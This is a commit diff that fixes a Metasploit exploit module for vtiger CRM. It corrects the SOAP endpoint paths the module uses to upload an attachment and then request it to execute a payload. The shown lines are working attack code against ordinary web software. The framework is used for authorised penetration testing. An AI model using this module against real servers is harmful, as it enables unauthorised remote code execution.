Land #2998, @bit4bit's fix for the vtigercrm exploit
commit
998fa06912
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Executing payload...")
|
print_status("#{peer} - Executing payload...")
|
||||||
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
|
send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0)
|
||||||
end
|
end
|
||||||
|
|
||||||
def add_attachment_soap(file_name, file_data)
|
def add_attachment_soap(file_name, file_data)
|
||||||
|
@ -170,8 +170,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def send_soap_request(soap_data)
|
def send_soap_request(soap_data)
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
|
'uri' => normalize_uri(target_uri.path, 'vtigerservice.php'),
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
|
'vars_get' => { 'service' => 'outlook' },
|
||||||
'ctype' => 'text/xml; charset=UTF-8',
|
'ctype' => 'text/xml; charset=UTF-8',
|
||||||
'data' => soap_data
|
'data' => soap_data
|
||||||
})
|
})
|
||||||
|
|
Loading…
Reference in New Issue